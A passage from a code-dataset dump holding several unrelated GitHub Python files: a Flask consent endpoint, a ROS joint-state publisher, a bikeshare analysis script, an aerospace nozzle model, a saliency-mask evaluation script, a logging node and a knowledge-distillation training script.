err:\n return exception_util.handler(err)\n\n\n@consent.route(\"/getActiveConsent\", methods=['POST'])\ndef get_active_consent():\n payload = request.get_json()\n\n try:\n header = header_util.build_header(request.headers)\n\n validated_data = InquiryConsentSchema().load(payload)\n criteria = Consent(**validated_data)\n\n consent = ConsentService().get_active_consent(criteria)\n data_fields = DataFieldService().get_consent_data_fields(\n consent.consent_code, consent.consent_version)\n consent.data_fields = data_fields\n\n return service_util.build_server_response(MessageCode.SUCCESS, consent)\n except (ValidationError, ServiceException) as err:\n return exception_util.handler(err)\n","repo_name":"cucpbioinfo/SmartDataTrust","sub_path":"api/controller/consent_controller.py","file_name":"consent_controller.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40536787055","text":"import logging; logger = logging.getLogger(\"morse.\"+ __name__)\n\nfrom morse_helpers import adapters\nfrom sensor_msgs.msg import JointState\n\n\nclass ArmStatePublisherForKLWR(adapters.ROSPublisher):\n\n ros_class = JointState\n NUM_JOINTS = 7\n\n def default(self, ci='unused'):\n\n message = JointState()\n message.header = self.get_ros_header()\n \n message.name = [''] * self.NUM_JOINTS\n message.position = [0] * self.NUM_JOINTS\n message.velocity = [0] * self.NUM_JOINTS\n message.effort = [0] * self.NUM_JOINTS\n \n # Define name used to export joints\n base_name = \"kuka_joint_\"\n \n for i in range(7):\n message.name[i] = base_name + (\"%d\" % (i+1) )\n message.position[i] = self.data[ \"kuka_\" + (\"%d\" % (i+1) ) ]\n\n self.publish(message)\n","repo_name":"dgerod/robots-in-morse-using-ros","sub_path":"robots/klwr_robot/klwr_morse/morse/simple_simulation/src/simple_simulation/runtime/middleware/state_publisher.py","file_name":"state_publisher.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72014202435","text":"import pandas as pd\r\nimport datetime as dt\r\nimport calendar\r\nimport numpy as np\r\nfrom time import time\r\n\r\nCITY_DATA = { 'Chicago': 'chicago.csv',\r\n 'New York': 'new_york_city.csv',\r\n 'Washington': 'washington.csv' }\r\nprint(\"A Wonderful day to you great Mentor!\")\r\n\r\n\r\ndef load_data(city, month, day):\r\n while True:\r\n try:\r\n # load data file into a dataframe\r\n City = str(input(\" Would you like to see data for Chicago, New York, or Washington? \\n\")).strip()\r\n df = pd.DataFrame(pd.read_csv(CITY_DATA[City]))\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. city: Chicago) \")\r\n else:\r\n break\r\n # convert the Start Time column to datetime\r\n df['Start Time'] = pd.to_datetime(df['Start Time'], format='%Y/%m/%d %H:%M:%S')\r\n\r\n # extract month and day of week from Start Time to create new columns\r\n df['month'] = pd.DatetimeIndex(df['Start Time']).month_name()\r\n df['day_of_week'] = pd.DatetimeIndex(df['Start Time']).day_name()\r\n\r\n filter_words = ['month', 'day', 'both']\r\n\r\n while True:\r\n try:\r\n filter_option = str(input(\" How would you like your data filtered?\\n please enter any of the options given below:\\n month\\n day\\n both \\n\"))\r\n\r\n if filter_option == 'month':\r\n while True:\r\n try:\r\n month1 = str(input(\" Please choose a month between January and June. Ensure to begin with a 'Capital letter'.(e.g. January)\\n\"))\r\n if month1 != 'both':\r\n # use the index of the months list to get the corresponding int\r\n months = ['January', 'February', 'March', 'April', 'May', 'June']\r\n month = months.index(month1)\r\n df = df[df['Start Time'].dt.month == month + 1]\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. January)\\n \")\r\n else:\r\n break\r\n\r\n elif filter_option == 'day':\r\n while True:\r\n try:\r\n day1 = input(\"Please enter a day of your choice. All days must begin with a capital letter. (e.g. Monday)\\n\")\r\n # filter by day of week if applicable\r\n if day1 != 'both':\r\n # filter by day of week to create the new dataframe\r\n days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\r\n day = days.index(day1)\r\n df = df[df['Start Time'].dt.day == day + 1]\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. Monday)\\n \")\r\n else:\r\n break\r\n\r\n elif filter_option == 'both':\r\n while True:\r\n try:\r\n month1 = input(\"Please choose a month between January and June. Ensure to begin with a 'Capital letter'.(e.g. January)\\n\")\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. January)\\n \")\r\n else:\r\n break\r\n while True:\r\n try:\r\n day1 = input(\"Please enter a day of your choice. All days must begin with a capital letter. (e.g. Monday)\\n\")\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a capital letter (e.g. Monday)\\n \")\r\n else:\r\n break\r\n if (month1 or day1) != 'all':\r\n months = ['January', 'February', 'March', 'April', 'May', 'June']\r\n days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']\r\n month = months.index(month1)\r\n day = days.index(day1)\r\n df = df[(df['Start Time'].dt.month == month + 1) & (df['Start Time'].dt.day == day + 1)]\r\n else:\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a lower case (e.g. month, day or both) \")\r\n if (filter_option not in filter_words):\r\n continue\r\n\r\n\r\n except (KeyError, NameError, TypeError, ValueError):\r\n print(\" Oooops!\\n Please use the appropriate name and begin with a lower case (e.g. month, day or both) \")\r\n if (filter_option not in filter_words):\r\n continue\r\n else:\r\n break\r\n return df\r\ndf = load_data('city', 'month', 'day')\r\nprint(\"Here is the data statistics you have requested for....\")\r\n# print value counts for each user type\r\nuser_types = pd.Series(df['User Type'].value_counts())\r\nprint(\"This is the user analysis \\n{} :\".format(user_types))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n\r\n# extract hour of week from Start Time to create new columns\r\ndf['hour'] = pd.DatetimeIndex(df['Start Time']).hour\r\nMost_popular_hour = pd.DataFrame(df['hour']).mode()\r\n\r\nprint(\"The Most common hour is \\n{} \".format(Most_popular_hour))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n\r\n# extract day from the Start Time column to create a day column\r\ndf['day'] = pd.DatetimeIndex(df['Start Time']).day_name()\r\n# find the most common day (from 0 to 23)\r\npopular_day = pd.DataFrame(df['day']).mode()\r\n\r\nprint(\"The Most Frequent Start Day of week:\\n{} \".format(popular_day))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n# extract month and day of week from Start Time to create new columns\r\ndf['month'] = pd.DatetimeIndex(df['Start Time']).month_name()\r\nMost_popular_month = pd.Series(df['month']).mode()\r\n\r\nprint(\"The Most common month is:\\n{}\".format(Most_popular_month))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n\r\nMost_popular_station = pd.Series(df['Start Station']).mode()\r\n\r\nprint(\"The most common start station is:\\n{}\".format(Most_popular_station))\r\n\r\nprint(\"computing the next data statistics.....\")\r\n\r\nMost_popular_end_station = pd.Series(df['End Station']).mode()\r\n\r\nprint(\"The most common end station is:\\n{}\".format(Most_popular_end_station))\r\nprint(\"computing the next data statistics.....\")\r\n\r\nMost_popular_trip_duration = pd.Series(df['Trip Duration']).mode()\r\nprint(\"The most common Trip duration are:\\n{}\".format(Most_popular_trip_duration))\r\n\r\nprint(\"computing the next data statistics.....\")\r\ndf['day_of_week1'] = pd.DatetimeIndex(df['Start Time']).day_name()\r\nbb = df['day_of_week1'].mode()\r\nprint(\"The most common day of the week is :\\n{} \".format(bb))\r\n\r\nprint(\"processing the next data....\")\r\n\r\ncolumns = ['Start Station', 'End Station']\r\ndf1 = pd.DataFrame(df[:], columns=columns).mode()\r\n\r\nprint(\"The most common trip from start to end is :\\n{} \".format(df1))\r\n\r\nprint(\"processing the next data....\")\r\n\r\nTotal_duration = np.sum(df['Trip Duration'])\r\nAverage_Total_duration = np.mean(df['Trip Duration'])\r\nprint(\"The total trip duration is:{} and the average of the durations is : {}\".format(Total_duration, Average_Total_duration))\r\nprint(\"processing the next data....\")\r\n\r\nGender_counts = pd.Series(df['Gender'].value_counts())\r\nprint(\"This is the count according to the gender:\\n {}\".format(Gender_counts))\r\nprint(\"processing the next data....\")\r\n\r\nMost_common_Birth_year = pd.Series(df['Birth Year']).mode()\r\nprint(\"The most common birth year is:\\n \", Most_common_Birth_year)\r\n\r\n(a,b) = (0,5)\r\nwhile True:\r\n if b>df.shape[0]:\r\n b = df.shape[0]+1\r\n print(df.iloc[a:b,:])\r\n a+=5\r\n if a>df.shape[0]:\r\n break\r\n b+=5\r\n CD = input(\"Do you want more data?\\n Enter yes or no\\n\").lower().strip()\r\n if CD == 'no':\r\n break\r\n","repo_name":"Hassanolowofela/wejapa-bikeshare-project","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":8269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38836386943","text":"## @ingroup Components-Energy-Converters\n# Compression_Nozzle.py\n#\n# Created: Jul 2014, A. Variyar\n# Modified: Jan 2016, T. MacDonald\n# Sep 2017, P. Goncalves\n# Jan 2018, W. Maier\n# Aug 2018, T. MacDonald\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\n\nimport SUAVE\n\n# python imports\nfrom warnings import warn\n\n# package imports\nimport numpy as np\n\nfrom SUAVE.Components.Energy.Energy_Component import Energy_Component\nfrom SUAVE.Methods.Propulsion.shock_train import shock_train\n\n# ----------------------------------------------------------------------\n# Compression Nozzle Component\n# ----------------------------------------------------------------------\n## @ingroup Components-Energy-Converters\nclass Compression_Nozzle(Energy_Component):\n \"\"\"This is a nozzle component intended for use in compression.\n Calling this class calls the compute function.\n\n Assumptions:\n Pressure ratio and efficiency do not change with varying conditions.\n Subsonic or choked output.\n\n Source:\n https://web.stanford.edu/~cantwell/AA283_Course_Material/AA283_Course_Notes/\n \"\"\"\n\n def __defaults__(self):\n \"\"\"This sets the default values for the component to function.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n None\n \"\"\"\n #setting the default values\n self.tag = 'Nozzle'\n self.polytropic_efficiency = 1.0\n self.pressure_ratio = 1.0\n self.pressure_recovery = 1.0\n self.compressibility_effects = False\n self.inputs.stagnation_temperature = 0.0\n self.inputs.stagnation_pressure = 0.0\n self.outputs.stagnation_temperature = 0.0\n self.outputs.stagnation_pressure = 0.0\n self.outputs.stagnation_enthalpy = 0.0\n self.compression_levels = 0.0\n self.theta = 0.0\n \n def compute(self,conditions):\n \"\"\" This computes the output values from the input values according to\n equations from the source.\n\n Assumptions:\n Constant polytropic efficiency and pressure ratio\n Adiabatic\n\n Source:\n https://web.stanford.edu/~cantwell/AA283_Course_Material/AA283_Course_Notes/\n\n Inputs:\n conditions.freestream.\n isentropic_expansion_factor [-]\n specific_heat_at_constant_pressure [J/(kg K)]\n pressure [Pa]\n gas_specific_constant [J/(kg K)]\n self.inputs.\n stagnation_temperature [K]\n stagnation_pressure [Pa]\n\n Outputs:\n self.outputs.\n stagnation_temperature [K]\n stagnation_pressure [Pa]\n stagnation_enthalpy [J/kg]\n mach_number [-]\n static_temperature [K]\n static_enthalpy [J/kg]\n velocity [m/s]\n\n Properties Used:\n self.\n pressure_ratio [-]\n polytropic_efficiency [-]\n pressure_recovery [-]\n \"\"\"\n\n #unpack from conditions\n gamma = conditions.freestream.isentropic_expansion_factor\n Cp = conditions.freestream.specific_heat_at_constant_pressure\n Po = conditions.freestream.pressure\n Mo = conditions.freestream.mach_number\n R = conditions.freestream.gas_specific_constant\n\n #unpack from inpust\n Tt_in = self.inputs.stagnation_temperature\n Pt_in = self.inputs.stagnation_pressure\n\n #unpack from self\n pid = self.pressure_ratio\n etapold = self.polytropic_efficiency\n eta_rec = self.pressure_recovery\n compressibility_effects = self.compressibility_effects\n\n #Method to compute the output variables\n\n #--Getting the output stagnation quantities\n Pt_out = Pt_in*pid*eta_rec\n Tt_out = Tt_in*(pid*eta_rec)**((gamma-1)/(gamma*etapold))\n ht_out = Cp*Tt_out\n\n if compressibility_effects :\n\n # Checking from Mach numbers below, above 1.0\n i_low = Mo <= 1.0\n i_high = Mo > 1.0\n\n #initializing the arrays\n Mach = np.ones_like(Pt_in)\n T_out = np.ones_like(Pt_in)\n Mo = Mo * np.ones_like(Pt_in)\n Pt_out = np.ones_like(Pt_in)\n P_out = np.ones_like(Pt_in)\n\n #-- Inlet Mach <= 1.0, isentropic relations\n Pt_out[i_low] = Pt_in[i_low]*pid\n Mach[i_low] = np.sqrt( (((Pt_out[i_low]/Po[i_low])**((gamma[i_low]-1.)/gamma[i_low]))-1.) *2./(gamma[i_low]-1.) ) \n T_out[i_low] = Tt_out[i_low]/(1.+(gamma[i_low]-1.)/2.*Mach[i_low]*Mach[i_low])\n\n #-- Inlet Mach > 1.0, normal shock\n Mach[i_high] = np.sqrt((1.+(gamma[i_high]-1.)/2.*Mo[i_high]**2.)/(gamma[i_high]*Mo[i_high]**2-(gamma[i_high]-1.)/2.))\n T_out[i_high] = Tt_out[i_high]/(1.+(gamma[i_high]-1.)/2*Mach[i_high]*Mach[i_high])\n Pt_out[i_high] = pid*Pt_in[i_high]*((((gamma[i_high]+1.)*(Mo[i_high]**2.))/((gamma[i_high]-1.)*Mo[i_high]**2.+2.))**(gamma[i_high]/(gamma[i_high]-1.)))*((gamma[i_high]+1.)/(2.*gamma[i_high]*Mo[i_high]**2.-(gamma[i_high]-1.)))**(1./(gamma[i_high]-1.))\n P_out[i_high] = Pt_out[i_high]*(1.+(gamma[i_high]-1.)/2.*Mach[i_high]**2.)**(-gamma[i_high]/(gamma[i_high]-1.))\n else:\n Pt_out = Pt_in*pid*eta_rec\n \n # in case pressures go too low\n if np.any(Pt_out Loading models...\")\n classifiers = {}\n\n torchvision_model_zoo_archs = ['densenet121', 'densenet169', 'densenet201', 'densenet161', 'resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn', 'vgg19', 'vgg19_bn']\n\n for name in torchvision_model_zoo_archs:\n model = models.__dict__[name](pretrained=True)\n if len(name) < 20:\n name = name + ('.'*(20 - len(name)))\n classifiers[name] = model.to(device).eval()\n print(\"=> Model '{}' loaded.\".format(name))\n\n if len(args.resnets_path) > 0:\n for path in glob.glob(os.path.join(args.resnets_path,'*')):\n name = path.split('/')[-1].split('.')[0]\n if len(name) < 20:\n name = name + ('.'*(20 - len(name)))\n classifiers[name] = models.resnet50()\n classifiers[name] = torch.nn.DataParallel(classifiers[name])\n checkpoint = torch.load(path)\n classifiers[name].load_state_dict(checkpoint['state_dict'])\n classifiers[name].to(device).eval()\n print(\"=> Checkpoint found at '{}'\\n=> Model '{}' loaded.\".format(path, name))\n\n ## data loader without normalization\n data_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(os.path.join(args.data, 'val'), transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n ])),\n batch_size=args.batch_size, shuffle=False, num_workers=args.workers, pin_memory=False)\n\n agg_results = {}\n if args.toy:\n agg_results['zero'] = confuse(os.path.join(args.log_path, 'zero'), {'special': 'zero'}, classifiers, data_loader)\n agg_results['one'] = confuse(os.path.join(args.log_path, 'one'), {'special': 'one'}, classifiers, data_loader)\n agg_results['random56'] = confuse(os.path.join(args.log_path,'random56'), {'special': 'random56'}, classifiers, data_loader)\n agg_results['random224'] = confuse(os.path.join(args.log_path, 'random224'), {'special': 'random224'}, classifiers, data_loader)\n\n for path in glob.glob(os.path.join(args.casms_path, '*')):\n model = load_model(path)\n agg_results[model['name']] = confuse(os.path.join(args.log_path, model['name']), model, classifiers, data_loader)\n\n print(agg_results)\n\ndef confuse(output_path, model, classifiers, data_loader):\n ## create an empty file and skip the evaluation if the file exists\n if args.save_to_file:\n if os.path.isfile(output_path):\n print(\"=> Output ({}) exists. Skipping.\".format(output_path))\n return {'skipped': True}\n open(output_path, 'a').close()\n\n if 'special' in model.keys():\n print(\"=> Special mode evaluation: {}.\".format(model['special']))\n\n ## setup meters\n masked_in_score = ScoreContainer(classifiers)\n masked_out_score = ScoreContainer(classifiers)\n inpainted_score = ScoreContainer(classifiers)\n\n ## initialize normalizer\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n ## data loop\n for i, (input, target) in enumerate(data_loader):\n if i > len(data_loader)*args.pot:\n print('')\n break\n\n if i % 10 == 1:\n print('.', end='', flush=True)\n if i + 10 >= len(data_loader)*args.pot: print('')\n\n ## compute continuous mask, thresholded mask and compare class predictions with targets\n if 'special' in model.keys():\n if model['special'] == 'zero':\n binary_mask = torch.zeros(input.size(0), 1, 224, 224)\n if model['special'] == 'one':\n binary_mask = torch.ones(input.size(0), 1, 224, 224)\n if model['special'] == 'random56':\n binary_mask = torch.zeros(input.size(0), 1, 56, 56)\n binary_mask.bernoulli_(0.5)\n binary_mask = nn.Upsample(scale_factor=4, mode='nearest')(binary_mask)\n if model['special'] == 'random224':\n binary_mask = torch.zeros(input.size(0), 1, 224, 224)\n binary_mask.bernoulli_(0.5)\n else:\n normalized_input = input.clone()\n for id in range(input.size(0)):\n normalize(normalized_input[id]) \n binary_mask = get_binarized_mask(normalized_input, model)\n\n masked_in, masked_out = get_masked_images(input, binary_mask)\n inpainted = inpaint(binary_mask, masked_out)\n\n for id in range(input.size(0)):\n normalize(masked_in[id])\n normalize(masked_out[id])\n normalize(inpainted[id])\n\n ## compute outputs on masked images\n target = target.to(device)\n for key in classifiers.keys():\n with torch.no_grad():\n masked_in_score.update(classifiers[key](masked_in.to(device)), target, key)\n masked_out_score.update(classifiers[key](masked_out.to(device)), target, key)\n inpainted_score.update(classifiers[key](inpainted.to(device)), target, key)\n\n results = {}\n results['masked_in'] = {}\n results['masked_out'] = {}\n results['inpainted'] = {}\n for key in classifiers.keys():\n results['masked_in'][key] = masked_in_score.getDictionary(key)\n results['masked_out'][key] = masked_out_score.getDictionary(key)\n results['inpainted'][key] = inpainted_score.getDictionary(key)\n\n if args.save_to_file:\n with open(output_path, 'a') as f:\n f.write(str(results))\n f.write('\\n' + string_args)\n\n print(results)\n\n return results\n\nclass ScoreContainer(object):\n def __init__(self, classifiers):\n self.criterion = nn.CrossEntropyLoss().to(device)\n\n self.losses = {}\n self.top1 = {}\n self.top5 = {}\n self.ent = {}\n for key in classifiers.keys():\n self.losses[key] = AverageMeter()\n self.top1[key] = AverageMeter()\n self.top5[key] = AverageMeter()\n self.ent[key] = AverageMeter() \n\n def update(self, output, target, key):\n with torch.no_grad():\n loss = self.criterion(output, target)\n self.losses[key].update(loss.item(), target.size(0))\n t1, t5 = accuracy(output, target, topk=(1, 5))\n self.top1[key].update(t1.item(), target.size(0))\n self.top5[key].update(t5.item(), target.size(0))\n\n log_prob = F.log_softmax(output,1)\n prob = log_prob.exp()\n entropy = -(log_prob * prob).sum(1).data\n self.ent[key].update(entropy.mean().item(), target.size(0)) \n\n def getDictionary(self, key):\n return {\n 'l': self.losses[key].avg,\n 't1': self.top1[key].avg,\n 't5': self.top5[key].avg,\n 'e': self.ent[key].avg\n }\n\nif __name__ == '__main__':\n main()","repo_name":"kondiz/casme","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":8933,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"61"} +{"seq_id":"37750113835","text":"\"\"\"Simple success node: log a message at specified log level\n\nAuthor(s):\n Carl Anderson (carl.anderson@weightwatchers.com)\n\n\"\"\"\nimport logging\nfrom primrose.base.success import AbstractSuccess\n\n\nclass LoggingSuccess(AbstractSuccess):\n \"\"\"simple success node: log a message\"\"\"\n\n @staticmethod\n def necessary_config(node_config):\n \"\"\"Return a list of necessary configuration keys within the implementation\n\n Args:\n node_config (dict): set of parameters / attributes for the node\n\n Note:\n msg: message you want logged\n level: one of 'DEBUG', 'INFO', 'WARN', 'ERROR', 'CRITICAL'\n\n Returns:\n set of keys necessary to run implementation\n\n \"\"\"\n return set([\"msg\", \"level\"])\n\n def run(self, data_object):\n \"\"\"Signal success by logging a message at specified log level\n\n Args:\n data_object (DataObject): DataObject instance\n\n Returns:\n nothing. Side effect is to signal success via logging\n\n \"\"\"\n msg = self.node_config[\"msg\"]\n\n level = str(self.node_config[\"level\"]).upper()\n\n # check whether valid level: will throw KeyError if level not recognized\n logging._nameToLevel[level]\n\n level = logging.getLevelName(level)\n\n logging.getLogger(\"\")._log(level, msg, None, None)\n\n terminate = False\n\n return data_object, terminate\n","repo_name":"ww-tech/primrose","sub_path":"primrose/cleanup/logging_success.py","file_name":"logging_success.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"4388147543","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nimport torch.nn.functional as F\n\nimport os\nimport shutil\nimport argparse\nimport numpy as np\n\nfrom methods import *\nimport models\nimport torchvision\nimport torchvision.transforms as transforms\nfrom utils import cal_param_size, cal_multi_adds, correct_num, adjust_lr, DistillKL, AverageMeter\nfrom dataloader.dataloaders import load_dataset\n\n\nimport time\nimport math\n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR Training')\nparser.add_argument('--dataset', default='CIFAR-100', type=str, help='Dataset')\nparser.add_argument('--data', default='./data/', type=str, help='Dataset directory')\nparser.add_argument('--arch', default='CIFAR_ResNet18', type=str, help='network architecture')\nparser.add_argument('--init-lr', default=0.1, type=float, help='learning rate')\nparser.add_argument('--warmup-epoch', default=5, type=int, help='warmup epoch')\nparser.add_argument('--lr-type', default='multistep', type=str, help='learning rate strategy')\nparser.add_argument('--data-aug', default='None', type=str, help='extra data augmentation')\nparser.add_argument('--milestones', default=[100, 150], type=list, help='milestones for lr-multistep')\nparser.add_argument('--epochs', type=int, default=200, help='number of epochs to train')\nparser.add_argument('--batch-size', type=int, default=128, help='batch size')\nparser.add_argument('--num-workers', type=int, default=8, help='number of workers')\nparser.add_argument('--method', default='cross_entropy', type=str, help='method')\nparser.add_argument('--gpu-id', type=str, default='0')\nparser.add_argument('--weight-decay', type=float, default=5e-4, help='weight decay')\nparser.add_argument('--weight-cls', type=float, default=1, help='weight for cross-entropy loss')\nparser.add_argument('--weight-kd', type=float, default=1, help='weight for KD loss')\nparser.add_argument('--T', type=float, default=4, help='temperature for KD distillation')\nparser.add_argument('--omega', default=0.5, type=float, help='ensembling weight in BAKE')\nparser.add_argument('--intra-imgs', '-m', default=3, type=int, help='intra-class images, M in BAKE')\nparser.add_argument('--alpha-T', default=0.8, type=float, help='alpha T in PS-KD')\nparser.add_argument('--manual_seed', type=int, default=0)\nparser.add_argument('--checkpoint-dir', default='./checkpoint/', type=str, help='saved checkpoint directory')\nparser.add_argument('--eval-checkpoint', default='./checkpoint/resnet18_best.pth', type=str, help='evaluate checkpoint directory')\nparser.add_argument('--resume-checkpoint', default='./checkpoint/resnet18.pth', type=str, help='resume checkpoint directory')\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\nparser.add_argument('--evaluate', '-e', action='store_true', help='evaluate model')\n\n# global hyperparameter set\nargs = parser.parse_args()\nprint(args)\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\n\n\ninfo = str(os.path.basename(__file__).split('.')[0]) \\\n + '_dataset_' + args.dataset \\\n + '_arch_' + args.arch \\\n + '_method_' + args.method \\\n + '_data_aug_' + args.data_aug \\\n + '_' + str(args.manual_seed)\n\n\nargs.checkpoint_dir = os.path.join(args.checkpoint_dir, info)\nif not os.path.isdir(args.checkpoint_dir):\n os.makedirs(args.checkpoint_dir)\nargs.log_txt = os.path.join(args.checkpoint_dir, info + '.txt')\n\nprint('dir for checkpoint:', args.checkpoint_dir)\nwith open(args.log_txt, 'a+') as f:\n f.write(\"==========\\nArgs:{}\\n==========\".format(args) + '\\n')\n \n\nnp.random.seed(args.manual_seed)\ntorch.manual_seed(args.manual_seed)\ntorch.cuda.manual_seed_all(args.manual_seed)\n\ntrainloader, valloader = load_dataset(args=args)\n\nprint('Dataset: '+ args.dataset)\nif args.dataset.startswith('CIFAR'):\n num_classes = len(set(trainloader.dataset.targets))\nelse:\n num_classes = len(set(trainloader.dataset.classes))\n\nprint('Number of train dataset: ' ,len(trainloader.dataset))\nprint('Number of validation dataset: ' ,len(valloader.dataset))\nprint('Number of classes: ' , num_classes)\nC, H, W = trainloader.dataset[0][0][0].size() if isinstance(trainloader.dataset[0][0], list) is True else trainloader.dataset[0][0].size()\n# --------------------------------------------------------------------------------------------\n\n# Model\nprint('==> Building model..')\nmodel = getattr(models, args.arch)\n\nif args.method == 'virtual_softmax':\n net = model(num_classes=num_classes, is_bias=False).eval()\nelse:\n net = model(num_classes=num_classes).eval()\n\n\nprint('Arch: %s, Params: %.2fM, Multi-adds: %.2fG'\n % (args.arch, cal_param_size(net) / 1e6, cal_multi_adds(net, (1, C, H, W)) / 1e9))\n\ndel (net)\n\n\nif args.method == 'virtual_softmax':\n net = model(num_classes=num_classes, is_bias=False).cuda()\nelse:\n net = model(num_classes=num_classes).cuda()\n\nnet = torch.nn.DataParallel(net)\ncudnn.benchmark = True\n\n\n\n# Training\ndef train(epoch, criterion_list, optimizer):\n train_loss = AverageMeter('train_loss', ':.4e')\n train_loss_cls = AverageMeter('train_loss_cls', ':.4e')\n train_loss_div = AverageMeter('train_loss_div', ':.4e')\n top1_num = 0\n top5_num = 0\n total = 0\n\n if epoch >= args.warmup_epoch:\n lr = adjust_lr(optimizer, epoch, args)\n start_time = time.time()\n criterion_cls = criterion_list[0]\n criterion_div = criterion_list[1]\n\n if args.method.startswith('PSKD'):\n if epoch == 0:\n all_predictions = torch.zeros(len(trainloader.dataset), num_classes, dtype=torch.float32)\n else:\n all_predictions = torch.load(os.path.join(args.checkpoint_dir, 'predictions.pth.tar'), map_location=torch.device('cpu'))['prev_pred']\n \n net.train()\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n batch_start_time = time.time()\n if isinstance(inputs, list) is False:\n inputs = inputs.cuda()\n batch_size = inputs.size(0)\n else:\n batch_size = inputs[0].size(0)\n \n if isinstance(targets, list) is False:\n targets = targets.cuda()\n else:\n input_indices = targets[1].cuda()\n targets = targets[0].cuda()\n\n if epoch < args.warmup_epoch:\n lr = adjust_lr(optimizer, epoch, args, batch_idx, len(trainloader))\n\n loss_div = torch.tensor(0.).cuda()\n loss_cls = torch.tensor(0.).cuda()\n\n \n if args.method == 'cross_entropy':\n logit = net(inputs)\n loss_cls += criterion_cls(logit, targets)\n elif args.method == 'mixup': \n logit, mixup_loss = Mixup(net, inputs, targets, criterion_cls, alpha=0.4)\n loss_cls += mixup_loss\n elif args.method == 'manifold_mixup': \n logit, manifold_mixup_loss = ManifoldMixup(net, inputs, targets, criterion_cls, alpha=2.0)\n loss_cls += manifold_mixup_loss\n elif args.method == 'cutmix': \n logit, cutmix_loss = CutMix(net, inputs, targets, criterion_cls, alpha=1.0)\n loss_cls += cutmix_loss\n elif args.method == 'label_smooth':\n logit = net(inputs)\n loss_cls += LabelSmooth(logit, targets, num_classes=num_classes)\n elif args.method == 'FocalLoss':\n logit = net(inputs) \n loss_cls += FocalLoss(logit, targets)\n elif args.method == 'TF_KD_self_reg':\n logit = net(inputs)\n loss_cls += criterion_cls(logit, targets)\n loss_div += TF_KD_reg(logit, targets, num_classes, epsilon=0.1, T=20)\n elif args.method == 'virtual_softmax':\n logit = net(inputs, targets, loss_type='virtual_softmax')\n loss_cls += criterion_cls(logit, targets)\n elif args.method == 'Maximum_entropy':\n logit = net(inputs, targets)\n entropy = (F.softmax(logit, dim=1) * F.log_softmax(logit, dim=1)).mean()\n loss_cls += criterion_cls(logit, targets) + 0.5 * entropy\n\n elif args.method == 'DKS':\n logit, dks_loss_cls, dks_loss_div = DKS(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += dks_loss_cls\n loss_div += dks_loss_div\n\n elif args.method == 'SAD':\n logit, sad_loss_cls, sad_loss_div = SAD(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += sad_loss_cls\n loss_div += sad_loss_div\n \n elif args.method == 'BYOT':\n logit, byot_loss_cls, byot_loss_div = BYOT(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += byot_loss_cls\n loss_div += byot_loss_div\n\n elif args.method == 'DDGSD':\n logit, ddsgd_loss_cls, ddsgd_loss_div = DDGSD(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += ddsgd_loss_cls\n loss_div += ddsgd_loss_div\n\n elif args.method == 'CS-KD':\n logit, cs_kd_loss_cls, cs_kd_loss_div = CS_KD(net, inputs, targets, criterion_cls, criterion_div)\n targets = targets[:batch_size//2]\n batch_size = batch_size // 2\n loss_cls += cs_kd_loss_cls\n loss_div += cs_kd_loss_div\n \n elif args.method.startswith('FRSKD'):\n logit, frskd_loss_cls, frskd_loss_div = FRSKD(net, inputs, targets, criterion_cls, criterion_div)\n loss_cls += frskd_loss_cls\n loss_div += frskd_loss_div\n\n elif args.method.startswith('PSKD'):\n logit, pskd_loss_cls = PSKD(net, inputs, targets, input_indices, epoch, all_predictions, num_classes, args)\n loss_cls += pskd_loss_cls\n\n elif args.method.startswith('BAKE'):\n logit, bake_loss_cls, bake_loss_div = BAKE(net, inputs, targets, criterion_cls, criterion_div, args)\n loss_cls += bake_loss_cls\n loss_div += bake_loss_div\n \n else:\n raise ValueError('Unknown 